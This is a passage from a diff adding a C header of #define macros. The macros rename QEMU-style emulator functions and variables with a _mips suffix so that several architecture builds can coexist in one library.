+#define memory_region_add_subregion memory_region_add_subregion_mips +#define memory_region_add_subregion_common memory_region_add_subregion_common_mips +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mips +#define memory_region_big_endian memory_region_big_endian_mips +#define memory_region_clear_pending memory_region_clear_pending_mips +#define memory_region_del_subregion memory_region_del_subregion_mips +#define memory_region_destructor_alias memory_region_destructor_alias_mips +#define memory_region_destructor_none memory_region_destructor_none_mips +#define memory_region_destructor_ram memory_region_destructor_ram_mips +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_mips +#define memory_region_dispatch_read memory_region_dispatch_read_mips +#define memory_region_dispatch_read1 memory_region_dispatch_read1_mips +#define memory_region_dispatch_write memory_region_dispatch_write_mips +#define memory_region_escape_name memory_region_escape_name_mips +#define memory_region_finalize memory_region_finalize_mips +#define memory_region_find memory_region_find_mips +#define memory_region_get_addr memory_region_get_addr_mips +#define memory_region_get_alignment memory_region_get_alignment_mips +#define memory_region_get_container memory_region_get_container_mips +#define memory_region_get_fd memory_region_get_fd_mips +#define memory_region_get_may_overlap memory_region_get_may_overlap_mips +#define memory_region_get_priority memory_region_get_priority_mips +#define memory_region_get_ram_addr memory_region_get_ram_addr_mips +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_mips +#define memory_region_get_size memory_region_get_size_mips +#define memory_region_info memory_region_info_mips +#define memory_region_init memory_region_init_mips +#define memory_region_init_alias memory_region_init_alias_mips +#define memory_region_initfn memory_region_initfn_mips +#define memory_region_init_io 
memory_region_init_io_mips +#define memory_region_init_ram memory_region_init_ram_mips +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_mips +#define memory_region_init_reservation memory_region_init_reservation_mips +#define memory_region_is_iommu memory_region_is_iommu_mips +#define memory_region_is_logging memory_region_is_logging_mips +#define memory_region_is_mapped memory_region_is_mapped_mips +#define memory_region_is_ram memory_region_is_ram_mips +#define memory_region_is_rom memory_region_is_rom_mips +#define memory_region_is_romd memory_region_is_romd_mips +#define memory_region_is_skip_dump memory_region_is_skip_dump_mips +#define memory_region_is_unassigned memory_region_is_unassigned_mips +#define memory_region_name memory_region_name_mips +#define memory_region_need_escape memory_region_need_escape_mips +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_mips +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_mips +#define memory_region_present memory_region_present_mips +#define memory_region_read_accessor memory_region_read_accessor_mips +#define memory_region_readd_subregion memory_region_readd_subregion_mips +#define memory_region_ref memory_region_ref_mips +#define memory_region_resolve_container memory_region_resolve_container_mips +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_mips +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_mips +#define memory_region_set_address memory_region_set_address_mips +#define memory_region_set_alias_offset memory_region_set_alias_offset_mips +#define memory_region_set_enabled memory_region_set_enabled_mips +#define memory_region_set_readonly memory_region_set_readonly_mips +#define memory_region_set_skip_dump memory_region_set_skip_dump_mips +#define memory_region_size memory_region_size_mips +#define memory_region_to_address_space memory_region_to_address_space_mips +#define 
memory_region_transaction_begin memory_region_transaction_begin_mips +#define memory_region_transaction_commit memory_region_transaction_commit_mips +#define memory_region_unref memory_region_unref_mips +#define memory_region_update_container_subregions memory_region_update_container_subregions_mips +#define memory_region_write_accessor memory_region_write_accessor_mips +#define memory_region_wrong_endianness memory_region_wrong_endianness_mips +#define memory_try_enable_merging memory_try_enable_merging_mips +#define module_call_init module_call_init_mips +#define module_load module_load_mips +#define mpidr_cp_reginfo mpidr_cp_reginfo_mips +#define mpidr_read mpidr_read_mips +#define msr_mask msr_mask_mips +#define mul128By64To192 mul128By64To192_mips +#define mul128To256 mul128To256_mips +#define mul64To128 mul64To128_mips +#define muldiv64 muldiv64_mips +#define neon_2rm_is_float_op neon_2rm_is_float_op_mips +#define neon_2rm_sizes neon_2rm_sizes_mips +#define neon_3r_sizes neon_3r_sizes_mips +#define neon_get_scalar neon_get_scalar_mips +#define neon_load_reg neon_load_reg_mips +#define neon_load_reg64 neon_load_reg64_mips +#define neon_load_scratch neon_load_scratch_mips +#define neon_ls_element_type neon_ls_element_type_mips +#define neon_reg_offset neon_reg_offset_mips +#define neon_store_reg neon_store_reg_mips +#define neon_store_reg64 neon_store_reg64_mips +#define neon_store_scratch neon_store_scratch_mips +#define new_ldst_label new_ldst_label_mips +#define next_list next_list_mips +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_mips +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_mips +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_mips +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_mips +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mips +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_mips +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_mips 
+#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_mips +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mips +#define not_v6_cp_reginfo not_v6_cp_reginfo_mips +#define not_v7_cp_reginfo not_v7_cp_reginfo_mips +#define not_v8_cp_reginfo not_v8_cp_reginfo_mips +#define object_child_foreach object_child_foreach_mips +#define object_class_foreach object_class_foreach_mips +#define object_class_foreach_tramp object_class_foreach_tramp_mips +#define object_class_get_list object_class_get_list_mips +#define object_class_get_list_tramp object_class_get_list_tramp_mips +#define object_class_get_parent object_class_get_parent_mips +#define object_deinit object_deinit_mips +#define object_dynamic_cast object_dynamic_cast_mips +#define object_finalize object_finalize_mips +#define object_finalize_child_property object_finalize_child_property_mips +#define object_get_child_property object_get_child_property_mips +#define object_get_link_property object_get_link_property_mips +#define object_get_root object_get_root_mips +#define object_initialize_with_type object_initialize_with_type_mips +#define object_init_with_type object_init_with_type_mips +#define object_instance_init object_instance_init_mips +#define object_new_with_type object_new_with_type_mips +#define object_post_init_with_type object_post_init_with_type_mips +#define object_property_add_alias object_property_add_alias_mips +#define object_property_add_link object_property_add_link_mips +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_mips +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_mips +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_mips +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_mips +#define object_property_allow_set_link object_property_allow_set_link_mips +#define object_property_del object_property_del_mips +#define object_property_del_all object_property_del_all_mips 
+#define object_property_find object_property_find_mips +#define object_property_get object_property_get_mips +#define object_property_get_bool object_property_get_bool_mips +#define object_property_get_int object_property_get_int_mips +#define object_property_get_link object_property_get_link_mips +#define object_property_get_qobject object_property_get_qobject_mips +#define object_property_get_str object_property_get_str_mips +#define object_property_get_type object_property_get_type_mips +#define object_property_is_child object_property_is_child_mips +#define object_property_set object_property_set_mips +#define object_property_set_description object_property_set_description_mips +#define object_property_set_link object_property_set_link_mips +#define object_property_set_qobject object_property_set_qobject_mips +#define object_release_link_property object_release_link_property_mips +#define object_resolve_abs_path object_resolve_abs_path_mips +#define object_resolve_child_property object_resolve_child_property_mips +#define object_resolve_link object_resolve_link_mips +#define object_resolve_link_property object_resolve_link_property_mips +#define object_resolve_partial_path object_resolve_partial_path_mips +#define object_resolve_path object_resolve_path_mips +#define object_resolve_path_component object_resolve_path_component_mips +#define object_resolve_path_type object_resolve_path_type_mips +#define object_set_link_property object_set_link_property_mips +#define object_unparent object_unparent_mips +#define omap_cachemaint_write omap_cachemaint_write_mips +#define omap_cp_reginfo omap_cp_reginfo_mips +#define omap_threadid_write omap_threadid_write_mips +#define omap_ticonfig_write omap_ticonfig_write_mips +#define omap_wfi_write omap_wfi_write_mips +#define op_bits op_bits_mips +#define open_modeflags open_modeflags_mips +#define op_to_mov op_to_mov_mips +#define op_to_movi op_to_movi_mips +#define output_type_enum output_type_enum_mips +#define 
packFloat128 packFloat128_mips +#define packFloat16 packFloat16_mips +#define packFloat32 packFloat32_mips +#define packFloat64 packFloat64_mips +#define packFloatx80 packFloatx80_mips +#define page_find page_find_mips +#define page_find_alloc page_find_alloc_mips +#define page_flush_tb page_flush_tb_mips +#define page_flush_tb_1 page_flush_tb_1_mips +#define page_init page_init_mips +#define page_size_init page_size_init_mips +#define par par_mips +#define parse_array parse_array_mips +#define parse_error parse_error_mips +#define parse_escape parse_escape_mips +#define parse_keyword parse_keyword_mips +#define parse_literal parse_literal_mips +#define parse_object parse_object_mips +#define parse_optional parse_optional_mips +#define parse_option_bool parse_option_bool_mips +#define parse_option_number parse_option_number_mips +#define parse_option_size parse_option_size_mips +#define parse_pair parse_pair_mips +#define parser_context_free parser_context_free_mips +#define parser_context_new parser_context_new_mips +#define parser_context_peek_token parser_context_peek_token_mips +#define parser_context_pop_token parser_context_pop_token_mips +#define parser_context_restore parser_context_restore_mips +#define parser_context_save parser_context_save_mips +#define parse_str parse_str_mips +#define parse_type_bool parse_type_bool_mips +#define parse_type_int parse_type_int_mips +#define parse_type_number parse_type_number_mips +#define parse_type_size parse_type_size_mips +#define parse_type_str parse_type_str_mips +#define parse_value parse_value_mips +#define par_write par_write_mips +#define patch_reloc patch_reloc_mips +#define phys_map_node_alloc phys_map_node_alloc_mips +#define phys_map_node_reserve phys_map_node_reserve_mips +#define phys_mem_alloc phys_mem_alloc_mips +#define phys_mem_set_alloc phys_mem_set_alloc_mips +#define phys_page_compact phys_page_compact_mips +#define phys_page_compact_all phys_page_compact_all_mips +#define phys_page_find 
phys_page_find_mips +#define phys_page_set phys_page_set_mips +#define phys_page_set_level phys_page_set_level_mips +#define phys_section_add phys_section_add_mips +#define phys_section_destroy phys_section_destroy_mips +#define phys_sections_free phys_sections_free_mips +#define pickNaN pickNaN_mips +#define pickNaNMulAdd pickNaNMulAdd_mips +#define pmccfiltr_write pmccfiltr_write_mips +#define pmccntr_read pmccntr_read_mips +#define pmccntr_sync pmccntr_sync_mips +#define pmccntr_write pmccntr_write_mips +#define pmccntr_write32 pmccntr_write32_mips +#define pmcntenclr_write pmcntenclr_write_mips +#define pmcntenset_write pmcntenset_write_mips +#define pmcr_write pmcr_write_mips +#define pmintenclr_write pmintenclr_write_mips +#define pmintenset_write pmintenset_write_mips +#define pmovsr_write pmovsr_write_mips +#define pmreg_access pmreg_access_mips +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_mips +#define pmsav5_data_ap_read pmsav5_data_ap_read_mips +#define pmsav5_data_ap_write pmsav5_data_ap_write_mips +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_mips +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_mips +#define pmuserenr_write pmuserenr_write_mips +#define pmxevtyper_write pmxevtyper_write_mips +#define print_type_bool print_type_bool_mips +#define print_type_int print_type_int_mips +#define print_type_number print_type_number_mips +#define print_type_size print_type_size_mips +#define print_type_str print_type_str_mips +#define propagateFloat128NaN propagateFloat128NaN_mips +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_mips +#define propagateFloat32NaN propagateFloat32NaN_mips +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_mips +#define propagateFloat64NaN propagateFloat64NaN_mips +#define propagateFloatx80NaN propagateFloatx80NaN_mips +#define property_get_alias property_get_alias_mips +#define property_get_bool property_get_bool_mips +#define property_get_str property_get_str_mips +#define property_get_uint16_ptr 
property_get_uint16_ptr_mips +#define property_get_uint32_ptr property_get_uint32_ptr_mips +#define property_get_uint64_ptr property_get_uint64_ptr_mips +#define property_get_uint8_ptr property_get_uint8_ptr_mips +#define property_release_alias property_release_alias_mips +#define property_release_bool property_release_bool_mips +#define property_release_str property_release_str_mips +#define property_resolve_alias property_resolve_alias_mips +#define property_set_alias property_set_alias_mips +#define property_set_bool property_set_bool_mips +#define property_set_str property_set_str_mips +#define pstate_read pstate_read_mips +#define pstate_write pstate_write_mips +#define pxa250_initfn pxa250_initfn_mips +#define pxa255_initfn pxa255_initfn_mips +#define pxa260_initfn pxa260_initfn_mips +#define pxa261_initfn pxa261_initfn_mips +#define pxa262_initfn pxa262_initfn_mips +#define pxa270a0_initfn pxa270a0_initfn_mips +#define pxa270a1_initfn pxa270a1_initfn_mips +#define pxa270b0_initfn pxa270b0_initfn_mips +#define pxa270b1_initfn pxa270b1_initfn_mips +#define pxa270c0_initfn pxa270c0_initfn_mips +#define pxa270c5_initfn pxa270c5_initfn_mips +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_mips +#define qapi_dealloc_end_list qapi_dealloc_end_list_mips +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_mips +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_mips +#define qapi_dealloc_next_list qapi_dealloc_next_list_mips +#define qapi_dealloc_pop qapi_dealloc_pop_mips +#define qapi_dealloc_push qapi_dealloc_push_mips +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_mips +#define qapi_dealloc_start_list qapi_dealloc_start_list_mips +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_mips +#define qapi_dealloc_start_union qapi_dealloc_start_union_mips +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_mips +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_mips +#define 
qapi_dealloc_type_int qapi_dealloc_type_int_mips +#define qapi_dealloc_type_number qapi_dealloc_type_number_mips +#define qapi_dealloc_type_size qapi_dealloc_type_size_mips +#define qapi_dealloc_type_str qapi_dealloc_type_str_mips +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_mips +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_mips +#define qapi_free_boolList qapi_free_boolList_mips +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_mips +#define qapi_free_int16List qapi_free_int16List_mips +#define qapi_free_int32List qapi_free_int32List_mips +#define qapi_free_int64List qapi_free_int64List_mips +#define qapi_free_int8List qapi_free_int8List_mips +#define qapi_free_intList qapi_free_intList_mips +#define qapi_free_numberList qapi_free_numberList_mips +#define qapi_free_strList qapi_free_strList_mips +#define qapi_free_uint16List qapi_free_uint16List_mips +#define qapi_free_uint32List qapi_free_uint32List_mips +#define qapi_free_uint64List qapi_free_uint64List_mips +#define qapi_free_uint8List qapi_free_uint8List_mips +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_mips +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_mips +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_mips +#define qbool_destroy_obj qbool_destroy_obj_mips +#define qbool_from_int qbool_from_int_mips +#define qbool_get_int qbool_get_int_mips +#define qbool_type qbool_type_mips +#define qbus_create qbus_create_mips +#define qbus_create_inplace qbus_create_inplace_mips +#define qbus_finalize qbus_finalize_mips +#define qbus_initfn qbus_initfn_mips +#define qbus_realize qbus_realize_mips +#define qdev_create qdev_create_mips +#define qdev_get_type qdev_get_type_mips +#define qdev_register_types qdev_register_types_mips +#define qdev_set_parent_bus qdev_set_parent_bus_mips +#define qdev_try_create qdev_try_create_mips +#define qdict_add_key qdict_add_key_mips +#define 
qdict_array_split qdict_array_split_mips +#define qdict_clone_shallow qdict_clone_shallow_mips +#define qdict_del qdict_del_mips +#define qdict_destroy_obj qdict_destroy_obj_mips +#define qdict_entry_key qdict_entry_key_mips +#define qdict_entry_value qdict_entry_value_mips +#define qdict_extract_subqdict qdict_extract_subqdict_mips +#define qdict_find qdict_find_mips +#define qdict_first qdict_first_mips +#define qdict_flatten qdict_flatten_mips +#define qdict_flatten_qdict qdict_flatten_qdict_mips +#define qdict_flatten_qlist qdict_flatten_qlist_mips +#define qdict_get qdict_get_mips +#define qdict_get_bool qdict_get_bool_mips +#define qdict_get_double qdict_get_double_mips +#define qdict_get_int qdict_get_int_mips +#define qdict_get_obj qdict_get_obj_mips +#define qdict_get_qdict qdict_get_qdict_mips +#define qdict_get_qlist qdict_get_qlist_mips +#define qdict_get_str qdict_get_str_mips +#define qdict_get_try_bool qdict_get_try_bool_mips +#define qdict_get_try_int qdict_get_try_int_mips +#define qdict_get_try_str qdict_get_try_str_mips +#define qdict_haskey qdict_haskey_mips +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_mips +#define qdict_iter qdict_iter_mips +#define qdict_join qdict_join_mips +#define qdict_new qdict_new_mips +#define qdict_next qdict_next_mips +#define qdict_next_entry qdict_next_entry_mips +#define qdict_put_obj qdict_put_obj_mips +#define qdict_size qdict_size_mips +#define qdict_type qdict_type_mips +#define qemu_clock_get_us qemu_clock_get_us_mips +#define qemu_clock_ptr qemu_clock_ptr_mips +#define qemu_clocks qemu_clocks_mips +#define qemu_get_cpu qemu_get_cpu_mips +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_mips +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_mips +#define qemu_get_ram_block qemu_get_ram_block_mips +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_mips +#define qemu_get_ram_fd qemu_get_ram_fd_mips +#define qemu_get_ram_ptr 
qemu_get_ram_ptr_mips +#define qemu_host_page_mask qemu_host_page_mask_mips +#define qemu_host_page_size qemu_host_page_size_mips +#define qemu_init_vcpu qemu_init_vcpu_mips +#define qemu_ld_helpers qemu_ld_helpers_mips +#define qemu_log_close qemu_log_close_mips +#define qemu_log_enabled qemu_log_enabled_mips +#define qemu_log_flush qemu_log_flush_mips +#define qemu_loglevel_mask qemu_loglevel_mask_mips +#define qemu_log_vprintf qemu_log_vprintf_mips +#define qemu_oom_check qemu_oom_check_mips +#define qemu_parse_fd qemu_parse_fd_mips +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_mips +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_mips +#define qemu_ram_alloc qemu_ram_alloc_mips +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mips +#define qemu_ram_foreach_block qemu_ram_foreach_block_mips +#define qemu_ram_free qemu_ram_free_mips +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_mips +#define qemu_ram_ptr_length qemu_ram_ptr_length_mips +#define qemu_ram_remap qemu_ram_remap_mips +#define qemu_ram_setup_dump qemu_ram_setup_dump_mips +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_mips +#define qemu_real_host_page_size qemu_real_host_page_size_mips +#define qemu_st_helpers qemu_st_helpers_mips +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_mips +#define qemu_try_memalign qemu_try_memalign_mips +#define qentry_destroy qentry_destroy_mips +#define qerror_human qerror_human_mips +#define qerror_report qerror_report_mips +#define qerror_report_err qerror_report_err_mips +#define qfloat_destroy_obj qfloat_destroy_obj_mips +#define qfloat_from_double qfloat_from_double_mips +#define qfloat_get_double qfloat_get_double_mips +#define qfloat_type qfloat_type_mips +#define qint_destroy_obj qint_destroy_obj_mips +#define qint_from_int qint_from_int_mips +#define qint_get_int qint_get_int_mips +#define qint_type qint_type_mips +#define qlist_append_obj qlist_append_obj_mips +#define qlist_copy qlist_copy_mips +#define 
qlist_copy_elem qlist_copy_elem_mips +#define qlist_destroy_obj qlist_destroy_obj_mips +#define qlist_empty qlist_empty_mips +#define qlist_entry_obj qlist_entry_obj_mips +#define qlist_first qlist_first_mips +#define qlist_iter qlist_iter_mips +#define qlist_new qlist_new_mips +#define qlist_next qlist_next_mips +#define qlist_peek qlist_peek_mips +#define qlist_pop qlist_pop_mips +#define qlist_size qlist_size_mips +#define qlist_size_iter qlist_size_iter_mips +#define qlist_type qlist_type_mips +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_mips +#define qmp_input_end_list qmp_input_end_list_mips +#define qmp_input_end_struct qmp_input_end_struct_mips +#define qmp_input_get_next_type qmp_input_get_next_type_mips +#define qmp_input_get_object qmp_input_get_object_mips +#define qmp_input_get_visitor qmp_input_get_visitor_mips +#define qmp_input_next_list qmp_input_next_list_mips +#define qmp_input_optional qmp_input_optional_mips +#define qmp_input_pop qmp_input_pop_mips +#define qmp_input_push qmp_input_push_mips +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_mips +#define qmp_input_start_list qmp_input_start_list_mips +#define qmp_input_start_struct qmp_input_start_struct_mips +#define qmp_input_type_bool qmp_input_type_bool_mips +#define qmp_input_type_int qmp_input_type_int_mips +#define qmp_input_type_number qmp_input_type_number_mips +#define qmp_input_type_str qmp_input_type_str_mips +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_mips +#define qmp_input_visitor_new qmp_input_visitor_new_mips +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_mips +#define qmp_output_add_obj qmp_output_add_obj_mips +#define qmp_output_end_list qmp_output_end_list_mips +#define qmp_output_end_struct qmp_output_end_struct_mips +#define qmp_output_first qmp_output_first_mips +#define qmp_output_get_qobject qmp_output_get_qobject_mips +#define qmp_output_get_visitor qmp_output_get_visitor_mips +#define 
qmp_output_last qmp_output_last_mips +#define qmp_output_next_list qmp_output_next_list_mips +#define qmp_output_pop qmp_output_pop_mips +#define qmp_output_push_obj qmp_output_push_obj_mips +#define qmp_output_start_list qmp_output_start_list_mips +#define qmp_output_start_struct qmp_output_start_struct_mips +#define qmp_output_type_bool qmp_output_type_bool_mips +#define qmp_output_type_int qmp_output_type_int_mips +#define qmp_output_type_number qmp_output_type_number_mips +#define qmp_output_type_str qmp_output_type_str_mips +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_mips +#define qmp_output_visitor_new qmp_output_visitor_new_mips +#define qobject_decref qobject_decref_mips +#define qobject_to_qbool qobject_to_qbool_mips +#define qobject_to_qdict qobject_to_qdict_mips +#define qobject_to_qfloat qobject_to_qfloat_mips +#define qobject_to_qint qobject_to_qint_mips +#define qobject_to_qlist qobject_to_qlist_mips +#define qobject_to_qstring qobject_to_qstring_mips +#define qobject_type qobject_type_mips +#define qstring_append qstring_append_mips +#define qstring_append_chr qstring_append_chr_mips +#define qstring_append_int qstring_append_int_mips +#define qstring_destroy_obj qstring_destroy_obj_mips +#define qstring_from_escaped_str qstring_from_escaped_str_mips +#define qstring_from_str qstring_from_str_mips +#define qstring_from_substr qstring_from_substr_mips +#define qstring_get_length qstring_get_length_mips +#define qstring_get_str qstring_get_str_mips +#define qstring_new qstring_new_mips +#define qstring_type qstring_type_mips +#define ram_block_add ram_block_add_mips +#define ram_size ram_size_mips +#define range_compare range_compare_mips +#define range_covers_byte range_covers_byte_mips +#define range_get_last range_get_last_mips +#define range_merge range_merge_mips +#define ranges_can_merge ranges_can_merge_mips +#define raw_read raw_read_mips +#define raw_write raw_write_mips +#define rcon rcon_mips +#define read_raw_cp_reg 
read_raw_cp_reg_mips +#define recip_estimate recip_estimate_mips +#define recip_sqrt_estimate recip_sqrt_estimate_mips +#define register_cp_regs_for_features register_cp_regs_for_features_mips +#define register_multipage register_multipage_mips +#define register_subpage register_subpage_mips +#define register_tm_clones register_tm_clones_mips +#define register_types_object register_types_object_mips +#define regnames regnames_mips +#define render_memory_region render_memory_region_mips +#define reset_all_temps reset_all_temps_mips +#define reset_temp reset_temp_mips +#define rol32 rol32_mips +#define rol64 rol64_mips +#define ror32 ror32_mips +#define ror64 ror64_mips +#define roundAndPackFloat128 roundAndPackFloat128_mips +#define roundAndPackFloat16 roundAndPackFloat16_mips +#define roundAndPackFloat32 roundAndPackFloat32_mips +#define roundAndPackFloat64 roundAndPackFloat64_mips +#define roundAndPackFloatx80 roundAndPackFloatx80_mips +#define roundAndPackInt32 roundAndPackInt32_mips +#define roundAndPackInt64 roundAndPackInt64_mips +#define roundAndPackUint64 roundAndPackUint64_mips +#define round_to_inf round_to_inf_mips +#define run_on_cpu run_on_cpu_mips +#define s0 s0_mips +#define S0 S0_mips +#define s1 s1_mips +#define S1 S1_mips +#define sa1100_initfn sa1100_initfn_mips +#define sa1110_initfn sa1110_initfn_mips +#define save_globals save_globals_mips +#define scr_write scr_write_mips +#define sctlr_write sctlr_write_mips +#define set_bit set_bit_mips +#define set_bits set_bits_mips +#define set_default_nan_mode set_default_nan_mode_mips +#define set_feature set_feature_mips +#define set_float_detect_tininess set_float_detect_tininess_mips +#define set_float_exception_flags set_float_exception_flags_mips +#define set_float_rounding_mode set_float_rounding_mode_mips +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_mips +#define set_flush_to_zero set_flush_to_zero_mips +#define set_swi_errno set_swi_errno_mips +#define sextract32 sextract32_mips 
+#define sextract64 sextract64_mips +#define shift128ExtraRightJamming shift128ExtraRightJamming_mips +#define shift128Right shift128Right_mips +#define shift128RightJamming shift128RightJamming_mips +#define shift32RightJamming shift32RightJamming_mips +#define shift64ExtraRightJamming shift64ExtraRightJamming_mips +#define shift64RightJamming shift64RightJamming_mips +#define shifter_out_im shifter_out_im_mips +#define shortShift128Left shortShift128Left_mips +#define shortShift192Left shortShift192Left_mips +#define simple_mpu_ap_bits simple_mpu_ap_bits_mips +#define size_code_gen_buffer size_code_gen_buffer_mips +#define softmmu_lock_user softmmu_lock_user_mips +#define softmmu_lock_user_string softmmu_lock_user_string_mips +#define softmmu_tget32 softmmu_tget32_mips +#define softmmu_tget8 softmmu_tget8_mips +#define softmmu_tput32 softmmu_tput32_mips +#define softmmu_unlock_user softmmu_unlock_user_mips +#define sort_constraints sort_constraints_mips +#define sp_el0_access sp_el0_access_mips +#define spsel_read spsel_read_mips +#define spsel_write spsel_write_mips +#define start_list start_list_mips +#define stb_p stb_p_mips +#define stb_phys stb_phys_mips +#define stl_be_p stl_be_p_mips +#define stl_be_phys stl_be_phys_mips +#define stl_he_p stl_he_p_mips +#define stl_le_p stl_le_p_mips +#define stl_le_phys stl_le_phys_mips +#define stl_phys stl_phys_mips +#define stl_phys_internal stl_phys_internal_mips +#define stl_phys_notdirty stl_phys_notdirty_mips +#define store_cpu_offset store_cpu_offset_mips +#define store_reg store_reg_mips +#define store_reg_bx store_reg_bx_mips +#define store_reg_from_load store_reg_from_load_mips +#define stq_be_p stq_be_p_mips +#define stq_be_phys stq_be_phys_mips +#define stq_he_p stq_he_p_mips +#define stq_le_p stq_le_p_mips +#define stq_le_phys stq_le_phys_mips +#define stq_phys stq_phys_mips +#define string_input_get_visitor string_input_get_visitor_mips +#define string_input_visitor_cleanup string_input_visitor_cleanup_mips 
+#define string_input_visitor_new string_input_visitor_new_mips +#define strongarm_cp_reginfo strongarm_cp_reginfo_mips +#define strstart strstart_mips +#define strtosz strtosz_mips +#define strtosz_suffix strtosz_suffix_mips +#define stw_be_p stw_be_p_mips +#define stw_be_phys stw_be_phys_mips +#define stw_he_p stw_he_p_mips +#define stw_le_p stw_le_p_mips +#define stw_le_phys stw_le_phys_mips +#define stw_phys stw_phys_mips +#define stw_phys_internal stw_phys_internal_mips +#define sub128 sub128_mips +#define sub16_sat sub16_sat_mips +#define sub16_usat sub16_usat_mips +#define sub192 sub192_mips +#define sub8_sat sub8_sat_mips +#define sub8_usat sub8_usat_mips +#define subFloat128Sigs subFloat128Sigs_mips +#define subFloat32Sigs subFloat32Sigs_mips +#define subFloat64Sigs subFloat64Sigs_mips +#define subFloatx80Sigs subFloatx80Sigs_mips +#define subpage_accepts subpage_accepts_mips +#define subpage_init subpage_init_mips +#define subpage_ops subpage_ops_mips +#define subpage_read subpage_read_mips +#define subpage_register subpage_register_mips +#define subpage_write subpage_write_mips +#define suffix_mul suffix_mul_mips +#define swap_commutative swap_commutative_mips +#define swap_commutative2 swap_commutative2_mips +#define switch_mode switch_mode_mips +#define switch_v7m_sp switch_v7m_sp_mips +#define syn_aa32_bkpt syn_aa32_bkpt_mips +#define syn_aa32_hvc syn_aa32_hvc_mips +#define syn_aa32_smc syn_aa32_smc_mips +#define syn_aa32_svc syn_aa32_svc_mips +#define syn_breakpoint syn_breakpoint_mips +#define sync_globals sync_globals_mips +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_mips +#define syn_cp14_rt_trap syn_cp14_rt_trap_mips +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_mips +#define syn_cp15_rt_trap syn_cp15_rt_trap_mips +#define syn_data_abort syn_data_abort_mips +#define syn_fp_access_trap syn_fp_access_trap_mips +#define syn_insn_abort syn_insn_abort_mips +#define syn_swstep syn_swstep_mips +#define syn_uncategorized syn_uncategorized_mips +#define 
syn_watchpoint syn_watchpoint_mips +#define syscall_err syscall_err_mips +#define system_bus_class_init system_bus_class_init_mips +#define system_bus_info system_bus_info_mips +#define t2ee_cp_reginfo t2ee_cp_reginfo_mips +#define table_logic_cc table_logic_cc_mips +#define target_parse_constraint target_parse_constraint_mips +#define target_words_bigendian target_words_bigendian_mips +#define tb_add_jump tb_add_jump_mips +#define tb_alloc tb_alloc_mips +#define tb_alloc_page tb_alloc_page_mips +#define tb_check_watchpoint tb_check_watchpoint_mips +#define tb_find_fast tb_find_fast_mips +#define tb_find_pc tb_find_pc_mips +#define tb_find_slow tb_find_slow_mips +#define tb_flush tb_flush_mips +#define tb_flush_jmp_cache tb_flush_jmp_cache_mips +#define tb_free tb_free_mips +#define tb_gen_code tb_gen_code_mips +#define tb_hash_remove tb_hash_remove_mips +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_mips +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mips +#define tb_invalidate_phys_range tb_invalidate_phys_range_mips +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_mips +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_mips +#define tb_jmp_remove tb_jmp_remove_mips +#define tb_link_page tb_link_page_mips +#define tb_page_remove tb_page_remove_mips +#define tb_phys_hash_func tb_phys_hash_func_mips +#define tb_phys_invalidate tb_phys_invalidate_mips +#define tb_reset_jump tb_reset_jump_mips +#define tb_set_jmp_target tb_set_jmp_target_mips +#define tcg_accel_class_init tcg_accel_class_init_mips +#define tcg_accel_type 